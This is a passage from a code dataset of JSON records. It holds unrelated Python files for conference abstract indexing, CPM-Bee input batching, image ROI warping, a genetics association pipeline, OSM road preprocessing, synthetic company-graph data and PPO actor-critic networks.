author[\"middlename\"] is None:\n df = pd.DataFrame(\n [\n _capitalise_name(author[\"lastname\"]),\n _capitalise_name(author[\"firstname\"]),\n \",\".join(sorted(author[\"submissionNumber\"])),\n ],\n index=[\"lastname\", \"firstname\", \"submissionNumber\"],\n )\n else:\n df = pd.DataFrame(\n [\n _capitalise_name(author[\"lastname\"]),\n f\"{_capitalise_name(author['firstname'])} {_capitalise_name(author['middlename']).replace('.', '')}\",\n \",\".join(sorted(author[\"submissionNumber\"])),\n ],\n index=[\"lastname\", \"firstname\", \"submissionNumber\"],\n )\n df_authors = pd.concat([df_authors, df.T], axis=0)\n df_authors = df_authors.sort_values(\"firstname\").sort_values(\"lastname\")\n return df_authors\n\n\ndef category_to_df(df_accepted, latebreaking_only=True):\n \"\"\"Conver the categories from dictionnair to dataframe that's competible\n with pdf creation.\"\"\"\n categories_finder, first_batch = _load_categories()\n categories_finder[\n \"Polarized light imaging (PLI)\"\n ] = \"Novel Imaging Acquisition Methods\"\n categories_finder[\n \"Optical coherence tomography (OCT)\"\n ] = \"Novel Imaging Acquisition Methods\"\n if latebreaking_only:\n poster_categories = _update_categores(\n df_accepted, categories_finder, {}\n )\n else:\n poster_categories = _update_categores(\n df_accepted, categories_finder, first_batch\n )\n df_cat = pd.DataFrame()\n for key in poster_categories:\n sub_cats = {key: None}\n for sk in poster_categories[key]:\n sub_cats[sk] = \",\".join(sorted(poster_categories[key][sk]))\n df = pd.DataFrame(sub_cats, index=range(1)).T\n index = df.index.tolist()\n if \"Other\" in index and index[-1] != \"Other\":\n index.remove(\"Other\")\n index.append(\"Other\")\n df_cat = pd.concat([df_cat, df.loc[index, :]], axis=0)\n return df_cat.reset_index()\n\n\ndef authro_index_ref(df_accepted):\n \"\"\"Create authro index reference.\"\"\"\n authors = {}\n for i, row in df_accepted.iterrows():\n for speaker in row[\"speakers\"][\"speaker\"]:\n speaker_id = int(speaker[\"@id\"])\n if speaker_id not in authors:\n authors[speaker_id] = {\n \"firstname\": speaker[\"firstname\"],\n \"middlename\": speaker[\"middlename\"],\n \"lastname\": speaker[\"lastname\"],\n \"submissionNumber\": set(),\n } # use set to prevent duplication\n if type(row[\"submissionNumber\"]) is list:\n for s in row[\"submissionNumber\"]:\n authors[speaker_id][\"submissionNumber\"].add(s)\n else:\n authors[speaker_id][\"submissionNumber\"].add(\n row[\"submissionNumber\"]\n )\n return authors\n\n\ndef _capitalise_name(x):\n \"\"\"Capitalise names.\"\"\"\n x = \" \".join(i.capitalize() for i in x.split(\" \"))\n if len(x.split(\"-\")) > 1:\n x = \"-\".join(i.capitalize() for i in x.split(\"-\"))\n return x\n\n\ndef _get_categories(df_accepted):\n \"\"\"Get primary and secondary category numbers for posters.\"\"\"\n df_accepted[\"primary_category\"] = None\n df_accepted[\"secondary_category\"] = None\n pc, sc = None, None\n for idx, row in df_accepted.iterrows():\n for cat in row[\"categories\"][\"category\"]:\n if cat[\"priorityOrder\"] == \"1\":\n pc = _parse_category_name(cat[\"name\"])\n elif cat[\"priorityOrder\"] == \"2\":\n sc = _parse_category_name(cat[\"name\"])\n df_accepted.loc[idx, \"primary_category\"] = pc\n df_accepted.loc[idx, \"secondary_category\"] = sc\n return df_accepted.loc[\n :,\n [\n \"submissionNumber\",\n \"title\",\n \"primary_category\",\n \"secondary_category\",\n ],\n ]\n\n\ndef _parse_category_name(name):\n \"\"\"Some weird names\"\"\"\n if name in exeption_cat:\n return exeption_cat[name]\n return (\n name.replace(\"’\", \"'\")\n .replace(\" La\", \"La\")\n .replace(\" Ea\", \"Ea\")\n .replace(\"/ V\", \"/V\")\n )\n\n\ndef _load_categories():\n \"\"\"Load the existing categories\"\"\"\n df_cat_exist = pd.read_csv(\n \"data/firstsubmission_categories_index.csv\", sep=\"€\", header=None\n )\n df_cat_exist.columns = [\"category\", \"poster_no\"]\n poster_categories = {}\n for _, row in df_cat_exist.iterrows():\n if not isinstance(row[\"poster_no\"], str):\n poster_categories[row[\"category\"]] = {}\n parent = row[\"category\"]\n else:\n poster_categories[parent][row[\"category\"]] = set(\n row[\"poster_no\"].split(\",\")\n )\n\n categories = {}\n for parent in poster_categories:\n sub_cats = poster_categories[parent].keys()\n for sub in sub_cats:\n if sub == \"Other\":\n categories[f\"{parent} {sub}\"] = parent\n else:\n categories[f\"{sub}\"] = parent\n return categories, poster_categories\n\n\ndef _update_categores(df_accepted, categories_finder, poster_categories):\n \"\"\"Add category info from a new set of entries\"\"\"\n update = poster_categories.copy()\n df_latebreak_categories = _get_categories(df_accepted)\n\n for _, row in df_latebreak_categories.iterrows():\n for cat in [\"primary_category\", \"secondary_category\"]:\n\n parent_cat = categories_finder.get(row[cat], False)\n if (\n \"Other\" in row[cat]\n and row[cat] == \"Non-Invasive Methods Other\"\n or \"Other\" not in row[cat]\n ):\n child_cat = row[cat]\n else:\n child_cat = \"Other\"\n\n if isinstance(parent_cat, str):\n if parent_cat not in update:\n update[parent_cat] = {child_cat: set()}\n if child_cat not in update[parent_cat]:\n update[parent_cat][child_cat] = set()\n update[parent_cat][child_cat].add(row[\"submissionNumber\"])\n else:\n print(row[\"title\"])\n print(\"cannot find:\", row[cat])\n print(\n \"category info:\",\n row[[\"primary_category\", \"secondary_category\"]].tolist(),\n )\n return update\n","repo_name":"margulies/ohbm2021","sub_path":"ohbm2021_abstract_book/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8651,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"33022429888","text":"from cpm_live.training_tasks.bee.pretrain import convert_data_to_id\nfrom cpm_live.utils import pad\nimport torch.nn.functional as F\nfrom cpm_live.tokenizers import CPMBeeTokenizer\nimport torch\nfrom typing import Any, Dict, List, Tuple\nimport numpy as np\n\n\ndef _convert_to_tensors(data: Any, in_context_samples: List[Any] = []):\n tokenizer = CPMBeeTokenizer()\n answer_placeholders = []\n def _put_placeholder(data: Any, path: List[str] = []):\n if isinstance(data, dict):\n ret = {}\n for k, v in data.items():\n ret[k] = _put_placeholder(v, path + [k])\n return ret\n else:\n answer_placeholders.append(path)\n return \"\".format(len(answer_placeholders))\n \n data[\"\"] = _put_placeholder(data[\"\"])\n (\n input_ids,\n input_id_subs,\n context,\n segment_ids,\n segment_rel,\n n_segments,\n table_states,\n ) = convert_data_to_id(tokenizer, data, shuffle_answer=False, max_depth=8)\n \n sub_ans_map: Dict[int, int] = {}\n for fake_id, token_sub in table_states[\"token_id_table\"][\"\"].items():\n token = table_states[\"ext_table\"][fake_id]\n if token.startswith(\"\"):\n ans_id = int(token[5:-1])\n sub_ans_map[token_sub] = ans_id\n\n tmp_input_ids = []\n tmp_input_sub = []\n tmp_input_seg = []\n\n predict_segments: List[Tuple[int, int]] = []\n for i in range(input_ids.shape[0]):\n if context[i] == 0:\n if input_ids[i] == tokenizer.encoder[\"\"]:\n # is ans\n # (segment_id, ans_id)\n predict_segments.append((segment_ids[i], sub_ans_map[input_id_subs[i]]))\n else:\n tmp_input_ids.append(input_ids[i])\n tmp_input_sub.append(input_id_subs[i])\n tmp_input_seg.append(segment_ids[i])\n\n if len(predict_segments) == 0:\n raise ValueError(\"No answer to predict\")\n\n input_ids = np.array(tmp_input_ids, dtype=np.int32)\n input_id_subs = np.array(tmp_input_sub, dtype=np.int32)\n context = np.full_like(tmp_input_ids, 1, dtype=np.int8)\n segment_ids = np.array(tmp_input_seg, dtype=np.int32)\n sample_ids = np.zeros(input_ids.shape, dtype=np.int32)\n segment_rel_offset = np.zeros(input_ids.shape, dtype=np.int32)\n num_segments = np.full(input_ids.shape, n_segments, dtype=np.int32)\n\n for i, sample in enumerate(in_context_samples):\n (\n sample_input_ids,\n sample_id_subs,\n _,\n sample_segments,\n sample_rel,\n n_segments,\n table_states,\n ) = convert_data_to_id(self.tokenizer, sample, table_states, max_depth=8)\n input_ids = np.concatenate([input_ids, sample_input_ids], axis=0)\n input_id_subs = np.concatenate([input_id_subs, sample_id_subs], axis=0)\n context = np.concatenate(\n [context, np.ones(sample_input_ids.shape, dtype=np.int8)], axis=0\n )\n segment_ids = np.concatenate([segment_ids, sample_segments], axis=0)\n segment_rel_offset = np.concatenate(\n [\n segment_rel_offset,\n np.full(sample_input_ids.shape, segment_rel.shape[0], dtype=np.int32),\n ],\n axis=0,\n )\n segment_rel = np.concatenate([segment_rel, sample_rel], axis=0)\n sample_ids = np.concatenate(\n [sample_ids, np.full(sample_input_ids.shape, i + 1, dtype=np.int32)], axis=0\n )\n num_segments = np.concatenate(\n [num_segments, np.full(sample_input_ids.shape, n_segments, dtype=np.int32)], axis=0\n )\n input_pos = np.arange(input_ids.shape[0], dtype=np.int32)\n\n return (\n input_ids,\n input_id_subs,\n input_pos,\n context,\n segment_ids,\n segment_rel_offset,\n segment_rel,\n sample_ids,\n num_segments,\n predict_segments,\n answer_placeholders,\n table_states[\"ext_table\"],\n table_states[\"token_id_table\"],\n )\n\ndef process_sentence_list(data_list: List[Any]):\n pack_tensor = []\n other_info = []\n segment_rel_pack = []\n\n batch_ext_table_map: Dict[Tuple[int, int], int] = {}\n batch_ext_table_ids: List[int] = []\n batch_ext_table_sub: List[int] = []\n \n for data in data_list:\n # print(data)\n (\n input_ids,\n input_id_subs,\n input_pos,\n context,\n segment_ids,\n segment_rel_offset,\n segment_rel,\n sample_ids,\n num_segments,\n predict_segments,\n answer_placeholders,\n ext_table,\n token_id_table,\n ) = _convert_to_tensors(data, [])\n rev_ext_table: Dict[int, str] = {}\n for token, mp in token_id_table.items():\n if token == \"\":\n continue\n token_id = tokenizer.encoder[token]\n for fake_id, token_sub in mp.items():\n if token_sub > 0:\n if (token_id, token_sub) not in batch_ext_table_map:\n batch_ext_table_map[(token_id, token_sub)] = (\n len(batch_ext_table_ids) + tokenizer.vocab_size\n )\n batch_ext_table_ids.append(token_id)\n batch_ext_table_sub.append(token_sub)\n rev_ext_table[batch_ext_table_map[(token_id, token_sub)]] = ext_table[\n fake_id\n ]\n else:\n rev_ext_table[token_id] = ext_table[fake_id]\n pack_tensor.append(\n {\n \"input\": torch.from_numpy(input_ids).unsqueeze(0),\n \"input_sub\": torch.from_numpy(input_id_subs).unsqueeze(0),\n \"context\": torch.from_numpy(context).unsqueeze(0),\n \"sample_ids\": torch.from_numpy(sample_ids).unsqueeze(0),\n \"num_segments\": torch.from_numpy(num_segments).unsqueeze(0),\n \"segment\": torch.from_numpy(segment_ids).unsqueeze(0),\n \"segment_rel_offset\": torch.from_numpy(segment_rel_offset).unsqueeze(0),\n \"length\" : torch.tensor([len(data) for data in torch.from_numpy(input_ids).unsqueeze(0)])\n }\n )\n segment_rel_pack.append(torch.from_numpy(segment_rel))\n other_info.append(\n {\n \"predict_segments\": predict_segments,\n \"answer_placeholders\": answer_placeholders,\n \"ext_table\": rev_ext_table,\n }\n )\n\n keys = set(pack_tensor[0].keys())\n padded = {}\n for key in keys:\n padded[key] = pad(pack_tensor, key)\n\n max_num_rels = 0\n for rel in segment_rel_pack:\n max_num_rels = max(max_num_rels, rel.size(0))\n padded_rels = torch.zeros(len(segment_rel_pack), max_num_rels, dtype=torch.int32)\n for i, rel in enumerate(segment_rel_pack):\n padded_rels[i, : rel.size(0)] = rel\n padded[\"segment_rel\"] = padded_rels\n padded[\"ext_table_ids\"] = torch.tensor(\n batch_ext_table_ids, dtype=torch.int32\n )\n padded[\"ext_table_sub\"] = torch.tensor(\n batch_ext_table_sub, dtype=torch.int32\n )\n padded['span'] = torch.zeros(padded['input'].shape).cuda()\n # move to model device\n for k, v in padded.items():\n if isinstance(v, torch.Tensor):\n padded[k] = v.cuda()\n\n return padded, other_info","repo_name":"guankaisi/SentCPM","sub_path":"SentCPM/input_type.py","file_name":"input_type.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20523694670","text":"import time\nimport webbrowser\n\ndef break_time():\n\n\tprint(\"The program started on \"+time.ctime())\n\twait=0\n\twhile(wait<3):\n\t\twebbrowser.open('https://www.youtube.com/watch?v=_WOwRVTKJUw')\n\t\ttime.sleep(2)\n\t\twait=wait+1\n\nbreak_time()\n","repo_name":"sudosree/Python","sub_path":"project/take_break.py","file_name":"take_break.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72596100882","text":"import cv2\nimport math\nimport numpy as np\n\nfrom taggridscanner.aux.utils import Functor, rel_corners_to_abs_corners\n\n\ndef create_frame_corners(size):\n width, height = size\n return np.array(\n [\n [0, 0],\n [width, 0],\n [width, height],\n [0, height],\n ],\n dtype=np.float32,\n )\n\n\ndef create_unit_frame_corners():\n return create_frame_corners((1, 1))\n\n\ndef distance(p0, p1):\n return np.linalg.norm(p1 - p0)\n\n\ndef compute_roi_shape(roi_corners, roi_aspect_ratio):\n p = roi_corners\n\n dist_v_left = distance(p[3], p[0])\n dist_v_right = distance(p[1], p[2])\n dist_v = max(dist_v_left, dist_v_right)\n\n dist_h_top = distance(p[0], p[1])\n dist_h_bottom = distance(p[2], p[3])\n dist_h = max(dist_h_top, dist_h_bottom)\n\n if dist_v * roi_aspect_ratio * dist_v > dist_h * dist_h / roi_aspect_ratio:\n h = math.ceil(dist_v)\n w = math.ceil(dist_v * roi_aspect_ratio)\n else:\n h = math.ceil(dist_h / roi_aspect_ratio)\n w = math.ceil(dist_h)\n\n return h, w\n\n\n# transforms the frame into the 1x1 square with top-left corner (0,0)\ndef to_frame_1x1_mat(detected_frame_corners):\n unit_frame_corners = create_unit_frame_corners()\n h = cv2.findHomography(detected_frame_corners, unit_frame_corners)\n return h[0]\n\n\ndef compute_roi_matrix(image_shape, rel_corners, roi_shape):\n img_height, img_width = image_shape[0:2]\n downscale_mat = np.array(\n [\n [1.0 / img_width, 0, 0],\n [0, 1.0 / img_height, 0],\n [0, 0, 1],\n ]\n )\n\n roi_height, roi_width = roi_shape\n upscale_mat = np.array(\n [\n [roi_width, 0, 0],\n [0, roi_height, 0],\n [0, 0, 1],\n ]\n )\n\n unit_roi_mat = to_frame_1x1_mat(rel_corners)\n\n mat = np.matmul(upscale_mat, np.matmul(unit_roi_mat, downscale_mat))\n\n return mat\n\n\nclass ExtractROI(Functor):\n def __init__(self, target_aspect_ratio, rel_corners=create_unit_frame_corners()):\n super().__init__()\n self.target_aspect_ratio = target_aspect_ratio\n self.rel_corners = rel_corners\n\n def __call__(self, image):\n # compute target ROI size\n abs_corners = rel_corners_to_abs_corners(self.rel_corners, image.shape)\n target_size = compute_roi_shape(abs_corners, self.target_aspect_ratio)\n\n # compute homography matrix\n mtx = compute_roi_matrix(image.shape, self.rel_corners, target_size)\n\n return cv2.warpPerspective(image, mtx, target_size, flags=cv2.INTER_AREA)\n","repo_name":"IMAGINARY/tag-grid-scanner","sub_path":"taggridscanner/pipeline/extract_roi.py","file_name":"extract_roi.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"24298477431","text":"import os\nimport scipy\nimport random\nimport subprocess\nimport numpy as np\nimport pandas as pd\nfrom utils import *\nfrom multiprocessing import Pool\ndef worker(ind, f1, f2, out_f, step=1000): # f save in 'scipy.sparese.npz' format\n\t\tm1 = scipy.sparse.load_npz(f1) \n\t\tm2 = scipy.sparse.load_npz(f2)\n\t\tm2 = csr_matrix(m2[ind*step:(ind+1)*step, :])\n\t\tif m1.shape[1] != m2.shape[0]:\n\t\t\traise('dimention incompatible!')\n\t\tm = m1.dot(m2)\t\n\t\tscipy.sparse.save_npz(out_f, m)\ndef dd_dot(d1, d2, out, parallel=True):\n\tprint('Starting dd_dot ...')\n\tprint('d1: ', d1)\n\tprint('d2: ', d2)\n\td1_lst = sorted(os.listdir(d1)) # sg_d\n\td2_lst = sorted(os.listdir(d2)) # si_d\n\tif (d1_lst == d2_lst):\n\t\tprint('d1 and d2 have the same order.')\n\telse:\n\t\tprint('len(d1):', len(d1))\n\t\tprint('len(d2):', len(d2))\n\t\traise(\"ERROR: d1 doesn't match with d2!\")\n\tprint('ig d:', out)\n\tout_lst = os.listdir(out)\n\tout_lst = [i.split('.')[0] for i in out_lst]\n\tif len(out_lst) != len(d1_lst):\n\t\tpool = Pool(10)\n\t\tfor ind, (d1_f, d2_f) in enumerate(zip(d1_lst, d2_lst)):\n\t\t\tif d1_f not in out_lst:\n\t\t\t\tcommon_f = d1_f\n\t\t\t\tout_f = '{}/{}'.format(out, common_f)\n\t\t\t\td1_f = '{}/{}'.format(d1, common_f)\n\t\t\t\td2_f = '{}/{}'.format(d2, common_f)\n\t#\t\t\tprint('into loop')\n\t\t\t\tif parallel:\n\t\t\t\t\tpool.apply_async(worker,(ind, d1_f, d2_f, out_f,))\n\t\t\t\telse:\n\t\t\t\t\tworker(ind, d1_f, d2_f, out_f)\n\t\tpool.close()\n\t\tpool.join()\n\t\tgo_on = True\n\telse:\n\t\tgo_on = False\n\t\tprint('dd mult done, results save to {}.'.format(out))\n\treturn go_on \ndef mult_casual(pre, sg_f, gg_f=None, reg=None, step=1):\n\td, _ = os.path.split(pre)\n\tgdic_f = '{}_gdic.txt'.format(pre)\n\tpheno_f = '{}.pheno'.format(pre)\n\t_, sg_pre = os.path.split(sg_f) \n\tsg_pre = sg_pre[:-7]\n\tsg_d = '{}/{}_sg'.format(d, sg_pre)\n\tis_d = '{}/{}_is'.format(d, sg_pre)\n\tig_d = '{}/{}_ig'.format(d, sg_pre)\n\tif gg_f:\n\t\t_, gg_pre = os.path.split(gg_f)\n\t\t#gg_pre = gg_pre[:-8]\n\t\tprint('gg_pre', gg_pre)\n\t\tgeno_f = '{}/{}.{}.{}.isg.geno'.format(d, sg_pre, gg_pre, step)\n\t\to = '{}.{}.{}.isg'.format(sg_pre, gg_pre, step)\n\telse:\t\n\t\tgeno_f = '{}/{}.is.geno'.format(d, sg_pre)\n\t\to = '{}.is'.format(sg_pre)\n\tprint('o', o)\n\tprint('sg_d', sg_d)\n\tprint('is_d', is_d)\n\tprint('ig_d', ig_d)\n\tprint('geno_f', geno_f)\n\t# main\n\tif not reg:\n\t\tgo_on = dd_dot(is_d, sg_d, ig_d, parallel=False)\n\t\tif go_on:\n\t\t\tdd_dot(is_d, sg_d, ig_d)\n\t\t\tprint('complting igmat ...')\n\t\tig = os.listdir(ig_d)\n\t\tigmat = scipy.sparse.load_npz(os.path.join(ig_d, ig[0]))\n\t\tfor i in ig[1:]:\n\t\t\tigmat += scipy.sparse.load_npz(os.path.join(ig_d, i))\n\t\tif gg_f:\n\t\t\tggmat = scipy.sparse.load_npz(gg_f)\n\t\t\tggmat = ggmat.power(step)\n\t\t\tigmat = igmat.dot(ggmat)\n\t\tigmat = igmat.toarray()\n\t\tigmat = rescale(igmat)\n\t\tgimat = igmat.transpose()\n\t\tgimat = pd.DataFrame(gimat)\n\t\tprint('the final shape is :', gimat.shape)\n\t\tlmat = left(gdic_f)\n\t\tomat = pd.concat([lmat, gimat], ignore_index=True, axis=1)\n\t\tprint('outputing geno to {}.'.format(geno_f))\n\t\tomat.to_csv(geno_f, header=None, index=False)\n\torder = 'gemma -g {} -p {} -lm 1 -outdir {} -o {}'.format(geno_f, pheno_f, d, o); print(order); os.system(order)\ndef mult_input(pre, sg_f):\n\td, _ = os.path.split(pre)\n\t_, sg_pre = os.path.split(sg_f)\n\tsg_pre = sg_pre[:-7]\n\tsi_f = '{}.geno'.format(pre)\n\tgdic_f = '{}_gdic.txt'.format(pre)\n\tsdic_f = '{}_sdic.txt'.format(pre)\n\tis_d = '{}/{}_is'.format(d, sg_pre) \n\tsi_d = '{}/{}_si'.format(d, sg_pre) \n\tig_d = '{}/{}_ig'.format(d, sg_pre)\n\tsg_d = '{}/{}_sg'.format(d, sg_pre)\n\tif not os.path.isdir(is_d):\n\t\tos.makedirs(is_d)\n\tif not os.path.isdir(si_d):\n\t\tos.makedirs(si_d)\n\tif not os.path.isdir(ig_d):\n\t\tos.makedirs(ig_d)\n\tif not os.path.isdir(sg_d):\n\t\tos.makedirs(sg_d)\n\tbimbam_2_is(si_f, is_d=is_d, si_d=si_d)\t\n\tsg(sg_f, si_d=si_d, sg_d=sg_d, gdic_f=gdic_f, sdic_f=sdic_f)\ndef main_1():\n#\tmult_input('data/mult/arabi', 'data/arabi.20kb.sg.txt')\n\tfor r in range(1, 10):\n#\t\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', gg_f='data/ppi_mult/atpin.2.no-weight.ppi.txt.npz', step=r)\n\t\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', gg_f='data/ppi_mult/atpin.ppi.2evidence.weight.txt.npz', step=r)\n#\t\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', step=r)\ndef main_2():\n\tprint('Begin.')\n\tsg_d = 'data/mateqtl'\n\tppi_d = 'data/ppi_mult'\n\tfor i in os.listdir(sg_d):\n\t\tif i.endswith('sg.txt'):\n\t\t#\tif i != 'arabi.0.01.1e+06Dist.p.sg.txt':\n\t\t\tfor k in range(9, 5, -1):\n\t\t\t\tif i.startswith('arabi.5e-0{}'.format(k)):\n\t\t\t\t\tprint('sg is :', i)\n\t\t\t\t\ti = '{}/{}'.format(sg_d, i)\n\t\t\t\t\tmult_input('data/mult/arabi', i)\n\t\t\t\t\tmult_casual('data/mult/arabi', i)\n\t\t\t\t\tfor j in os.listdir(ppi_d):\n\t\t\t\t\t\tif j.endswith('npz'):\n\t\t\t\t\t\t\tj = '{}/{}'.format(ppi_d, j)\n\t\t\t\t\t\t\tmult_casual('data/mult/arabi', i, gg_f=j)\n# test svm kernel\ndef main_3():\n\td = 'data/svm'\n\td2 = 'data/mateqtl'\n\tfor i in os.listdir(d):\n\t\tif i.startswith('test.23445.153') and i.endswith('npz'):\n\t\t\tif i != 'test.23445.153.linear.kernel.npz':\n\t\t\t\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', gg_f='{}/{}'.format(d, i))\n\n\tfor i in os.listdir(d):\n\t\tif i.startswith('test.23445.153') and i.endswith('npz'):\n\t\t\tfor j in os.listdir(d2):\n\t\t\t\tif j.startswith('arabi.5e-06.1e+06') and j.endswith('sg.txt'):\n\t\t\t\t\tmult_casual('data/mult/arabi', '{}/{}'.format(d2, j), gg_f='{}/{}'.format(d, i))\n\t\t\t\t\ndef test():\n\tmult_input('./test/test')\n\tr = mult_casual('./test/test', 'test', reg=True)\n\tr = mult_casual('./test/test', 'test', gg_f='test/test.ppi.txt.npz')\n\tr = mult_input('data/mult/arabi', out_pre='data/mult/20kb', sg_pre='data/mult/arabi')\n\tr = mult_casual('data/mult/arabi', out_pre='data/mult/20kb', sg_pre='data/mult/arabi', gg_f='data/ppi_mult/atpin.2.no-weight.ppi.txt.npz')\n\tr = mult_casual('data/mult/arabi', out_pre='data/mult/20kb', sg_pre='data/mult/arabi', gg_f='data/ppi_mult/atpin.2.weight.ppi.txt.npz')\n\tr = mult_casual('data/mult/arabi', sg_f, reg=True)\n\t\nif __name__ == '__main__':\n\tmain_3()\n#\tmult_casual('data/mult/arabi', 'data/arabi.20kb.sg.txt', gg_f='data/svm/test.23445.153.linear.kernel.npz')\n","repo_name":"jianglinghan/MultCausal","sub_path":"MultCausal/multcausal.py","file_name":"multcausal.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31598263270","text":"import pandas as pd\nimport geopandas as gpd\n\ndef read_road_hierarchy(path=None):\n \n if path is None:\n path = 'C:/zhouweifile/Transportation Data/OSM/tag_processing.xlsx' \n \n hierarchy_mapper = pd.read_excel(path, sheet_name='highway', index_col=None, header=0) \\\n .query('Key == \\'highway\\'') \\\n .query('Hierarchy != \\'Deleted\\'')\\\n [['Value', 'Hierarchy']] \\\n .set_index('Value') \\\n .squeeze() \\\n .to_dict() \n \n return hierarchy_mapper\n# --------------------------------------------------------------------------\ndef preprocessed_road_network(path, drop_link=True, target_crs=None):\n\n data = gpd.read_file(path, encoding='gbk')\n \n if not (target_crs is None):\n data = data.to_crs(target_crs)\n \n if drop_link:\n for link_label in ['motorway_link', 'trunk_link', 'primary_link', 'secondary_link', 'tertiary_link']:\n data = data[data['highway'] != link_label]\n \n \n hierarchy_mapper = read_road_hierarchy(path=None)\n data['hierarchy'] = data['highway'].map(hierarchy_mapper)\n data = data[data['hierarchy'] != 'Deleted']\n data['geometry'] = data['geometry'].make_valid()\n \n return data\n# ==========================================================\n\n\n\nread_path = 'zip://road_network.zip!road_network.shp'\nsave_path = 'road_network_processed.shp'\n\ndata = preprocessed_road_network(read_path, target_crs=None)\ndata.to_file(save_path, encoding='utf-8')","repo_name":"veager/VeTool-Processing-POI-Landuse","sub_path":"OSM highway/road_network_preprocessing.py","file_name":"road_network_preprocessing.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9174129975","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 24 13:16:12 2020\n\n@author: gzy\n\"\"\"\n# encoding: utf-8\n\nimport random\nimport string\nimport time\nimport csv\n\ncompany = []\nrelation = []\nID = set() ###\nNAME = []\n\n# 模拟产生企业ID及NAME\n\nfor i in range(5000):\n # 模拟企业18位纳税人识别号\n\n id = random.randint(100000000,1000000000)\n id = str(id)\n #id = \"'\" + id\n\n # 模拟企业名称,随机生成的四个汉字\n\n first_name_val = random.randint(0x4e00, 0x5e95)\n second_name_val = random.randint(0x4e00, 0x5e95)\n third_name_val = random.randint(0x4e00, 0x5e95)\n fourth_name_val = random.randint(0x4e00, 0x5e95)\n\n first_name = chr(first_name_val)\n second_name = chr(second_name_val)\n third_name = chr(third_name_val)\n fourth_name = chr(fourth_name_val)\n\n name = first_name + second_name + third_name + fourth_name\n if id not in ID: ###\n ID.add(id) ####\n NAME.append(name)\n company.append([id,name])\n\nID = list(ID)\n# 模拟产生企业间票流\n\nfor i in ID: \n startID = random.choice(ID)\n \n J = random.randint(0,10)\n \n for j in range(J):\n endID = random.choice(ID)\n if startID != endID:\n K = random.randint(0,10)\n for k in range(K):\n\n amount = random.randint(0,10000)\n Type = random.choice(string.ascii_uppercase)\n \n a1=(2019,1,1,0,0,0,0,0,0) # 设置开始日期时间元组\n a2=(2019,12,31,23,59,59,0,0,0) # 设置结束日期时间元组\n start=time.mktime(a1) # 生成开始时间戳\n end=time.mktime(a2) # 生成结束时间戳\n t=random.randint(start,end)\n creat_time_touple=time.localtime(t)\n creat_time=time.strftime(\"%Y-%m-%d\",creat_time_touple)\n\n \n relation.append((startID,endID,amount,Type,creat_time))\n \n else:\n continue\n\n\n# 企业数据写入company.csv\n\n\nwith open(r'/data1/tq/neo4j-community-3.5.5/import/company.csv','w',newline='')as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(['id:ID','name'])\n for string in company:\n writer.writerow(string)\n\n\n# 关系数据写入relation.csv\n\nwith open(r'/data1/tq/neo4j-community-3.5.5/import/relation.csv','w',newline='')as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([':START_ID',':END_ID','amount:int',':Type','ctime:datetime'])\n for string in relation:\n writer.writerow(string)\n\n\n# 输出企业数据及关系数据\n# print(company)\n# print(relation)\n\n\n\n\n\n","repo_name":"GZYBigGG/NLPStudy","sub_path":"文本挖掘/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23021919190","text":"import torch.nn as nn\r\nfrom torch.distributions import Normal, Categorical\r\n\r\n\r\nclass Actor(nn.Module):\r\n def __init__(self, state_dim, d_dim, c_dim, hidden_dim):\r\n super(Actor, self).__init__()\r\n\r\n self.liner = nn.Sequential(\r\n nn.Linear(state_dim, hidden_dim),\r\n nn.Tanh(),\r\n #nn.ReLU(),\r\n nn.Linear(hidden_dim, hidden_dim),\r\n nn.Tanh()\r\n #nn.ReLU()\r\n )\r\n\r\n self.d_prob = nn.Sequential(\r\n nn.Linear(hidden_dim, d_dim),\r\n nn.Softmax(dim=-1)\r\n )\r\n\r\n self.mu_head = nn.Sequential(\r\n nn.Linear(hidden_dim, c_dim),\r\n nn.Sigmoid()\r\n )\r\n\r\n self.sigma_head = nn.Sequential(\r\n nn.Linear(hidden_dim, c_dim),\r\n nn.Softplus()\r\n )\r\n\r\n def forward(self, state):\r\n x = self.liner(state)\r\n d_probs = self.d_prob(x)\r\n mu = self.mu_head(x)\r\n sigma = self.sigma_head(x)\r\n return d_probs, mu, sigma\r\n\r\n def get_dist(self, state):\r\n d_probs, mu, sigma = self.forward(state)\r\n d_dist = Categorical(d_probs)\r\n c_dist = Normal(mu, sigma)\r\n return d_dist, c_dist\r\n\r\n\r\nclass Critic(nn.Module):\r\n def __init__(self, state_dim, hidden_dim):\r\n super(Critic, self).__init__()\r\n self.critic = nn.Sequential(\r\n nn.Linear(state_dim, hidden_dim),\r\n nn.ReLU(),\r\n nn.Linear(hidden_dim, hidden_dim),\r\n nn.ReLU(),\r\n nn.Linear(hidden_dim, 1)\r\n )\r\n\r\n def forward(self, state):\r\n value = self.critic(state)\r\n return value\r\n","repo_name":"RainingStorm/SmartMicroGrid","sub_path":"算法对比/PPO/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"1035760863","text":"import os\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nimport pickle\nimport 